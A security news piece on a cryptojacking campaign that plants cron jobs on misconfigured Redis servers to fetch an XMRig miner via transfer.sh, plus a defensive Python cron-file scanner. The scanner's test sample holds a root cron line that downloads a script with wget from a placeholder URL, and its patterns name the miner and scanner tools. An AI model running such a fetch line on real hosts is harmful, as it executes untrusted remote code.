
New Crypto Mining Campaign Uses Misconfigured Redis Database Servers


The malware delivers the payload using the transfer.sh public file sharing service.

Misconfigured Redis database servers are the target of a new cryptojacking campaign that uses the third-party file transfer service “transfer.sh” to carry out its attack.

Cloud cybersecurity firm Cado Security stated that the command-line interactivity associated with transfer.sh made it an ideal tool for hosting and delivering malicious payloads.

The attack chain begins with a search for vulnerable Redis deployments, followed by the registration of a job with the cron daemon, which causes arbitrary code to be executed. The job is designed to retrieve the payload hosted on transfer.sh.

It is worth noting that similar attack mechanisms have been used by other attackers such as TeamTNT and WatchDog in their cryptojacking operations.


The payload is a script that downloads and launches the XMRig cryptocurrency miner, but not before taking preparatory steps to free up memory, stop competing miners, and install a network scanning utility called pnscan to find vulnerable Redis servers and spread the malware.
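A defender can sweep cron files for the traces this chain leaves behind. The following is an added example, not code from Cado Security or the original article: it flags cron lines that mention transfer.sh, XMRig or pnscan. The rule names, the sample crontabs and the placeholder URL are constructed, and the RDB header check assumes the cron entry was written through a Redis dump, which the article does not state.

```python
import re

# Strings named in the article: the transfer.sh host, the XMRig miner, the pnscan scanner.
INDICATORS = {
    "transfer.sh": re.compile(r"\btransfer\.sh\b", re.I),
    "xmrig": re.compile(r"xmrig", re.I),
    "pnscan": re.compile(r"\bpnscan\b", re.I),
}
FETCHER = re.compile(r"\b(?:curl|wget)\b", re.I)
# Assumption: a cron file written through Redis' own dump mechanism starts with
# the RDB header ("REDIS" plus a 4-digit format version) and holds binary framing.
RDB_HEADER = re.compile(rb"REDIS\d{4}")


def audit_cron_blob(path, data):
    """Return (path, line_no, rule, text) findings for one cron file's raw bytes."""
    findings = []
    if RDB_HEADER.match(data):
        findings.append((path, 0, "rdb-header-in-cron-file", data[:9].decode("ascii")))
    for line_no, raw in enumerate(data.splitlines(), 1):
        line = raw.decode("utf-8", "replace").strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments never execute
        for name, pattern in INDICATORS.items():
            if not pattern.search(line):
                continue
            rule = name
            if name == "transfer.sh" and FETCHER.search(line):
                rule = "fetch-from-transfer.sh"
            findings.append((path, line_no, rule, line))
    return findings


# Constructed samples: a clean crontab and one resembling a Redis-written entry.
SAMPLE_CLEAN = b"# m h dom mon dow user command\n17 * * * * root run-parts /etc/cron.hourly\n"
SAMPLE_SUSPECT = (
    b"REDIS0009\xfa\tredis-ver\x055.0.7\n\n"
    b"*/2 * * * * root wget -q -O- https://transfer.sh/PLACEHOLDER/job.sh\n\n\xff"
)

if __name__ == "__main__":
    for name, blob in (("clean", SAMPLE_CLEAN), ("suspect", SAMPLE_SUSPECT)):
        for finding in audit_cron_blob(name, blob):
            print(finding)
```

To sweep a host, pass the function the raw bytes of each file under the system and per-user cron directories; any hit is a reason to review how the Redis instance is exposed.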

“While it is clear that the goal of this campaign is to seize system resources for cryptocurrency mining, infection with this malware can have unforeseen consequences,” the company said. “The ill-conceived configuration of Linux memory management systems can easily lead to data corruption or loss of system availability.”

Previously, vulnerabilities in Redis servers were exploited by the Redigo and HeadCrab malware.

Source: www.securitylab.ru
